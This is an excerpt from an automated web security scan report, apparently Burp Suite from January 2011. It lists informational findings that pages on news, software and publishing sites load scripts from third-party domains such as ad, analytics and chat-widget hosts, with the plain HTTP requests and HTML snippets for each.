Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /blogs/jets/2011/01/live-chat-friday-noon-1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:10:48 GMT
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Fri, 28 Jan 2011 14:10:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1296223848"
Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=798638bea14b1d09568b917696e409a0; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/
Content-Length: 95223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</fb:like>&nbsp;<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="small-votes">http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1</script>
...[SNIP]...
<div class="content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

18.832. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:10:49 GMT
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Fri, 28 Jan 2011 14:10:49 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1296223849"
Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=13e7f46734298e8a605b9431d8cfd80d; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/
Content-Length: 102098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</fb:like>&nbsp;<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="small-votes">http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm</script>
...[SNIP]...

18.833. http://www.paperg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:42 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 10755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.834. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/soundings-publications-llc/2123/0.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/soundings-publications-llc/2123/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4376
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.835. https://www.paperg.com/post.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /post.php?bid=2123&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
       
       
       <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</div>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

18.836. http://www.parker-software.com/forum/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parker-software.com
Path:   /forum/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forum/ HTTP/1.1
Host: www.parker-software.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 21920
Content-Type: text/html
Expires: Wed, 26 Jan 2011 13:58:10 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D01%2D28+13%3A58%3A10; expires=Sat, 28-Jan-2012 13:58:10 GMT; path=/forum/
Set-Cookie: WWF9sID=SID=629255141c2dfczb44f2d1ea4be92fz9; path=/forum/
Set-Cookie: ASPSESSIONIDCQSCRASQ=CIEMDCNAFMCFHFEFAKMMMFLF; path=/
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://gateway.whoson.com/include.js?domain=forums.parkersoft.co.uk'></script>
...[SNIP]...

18.837. http://www.parkersoft.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.838. http://www.parkersoft.co.uk/about.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /about.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14052


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.839. http://www.parkersoft.co.uk/client.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /client.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /client.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Proxy-Connection: keep-alive
Referer: http://www.whoson.com/installable.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45; path=/; HttpOnly
Set-Cookie: whoson=530-50268.8034574; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/
Date: Fri, 28 Jan 2011 13:57:48 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.840. http://www.parkersoft.co.uk/contact.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.841. http://www.parkersoft.co.uk/email2db.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /email2db.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /email2db.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14166


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.842. http://www.parkersoft.co.uk/partners.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /partners.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.843. http://www.parkersoft.co.uk/privacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /privacy.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /privacy.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17779


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.844. http://www.parkersoft.co.uk/products.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /products.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.845. http://www.parkersoft.co.uk/smsserver.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /smsserver.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /smsserver.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13645


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.846. http://www.parkersoft.co.uk/subscribe.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /subscribe.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /subscribe.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15163


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.847. http://www.parkersoft.co.uk/supnotes.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /supnotes.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /supnotes.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:58:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wd23wlvl4tjcz4554zaqcfyv; path=/; HttpOnly
Set-Cookie: whoson=584-50288.6160842; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.848. http://www.parkersoft.co.uk/terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /terms.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /terms.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.849. http://www.parkersoft.co.uk/whoson.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /whoson.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /whoson.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: whoson=530-50268.8034574; ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14191


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
</script>


<script src="http://gateway.whoson.com/invite.js?domain=www.parkersoft.co.uk" type="text/javascript"></script>
...[SNIP]...

18.850. http://www.quantcast.com/p-352ZWwG8I7OVQ

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantcast.com
Path:   /p-352ZWwG8I7OVQ

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /p-352ZWwG8I7OVQ HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 29 Jan 2011 04:37:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

18.851. http://www.soundingsonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.852. http://www.soundingsonline.com/about-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.853. http://www.soundingsonline.com/advertise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /advertise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
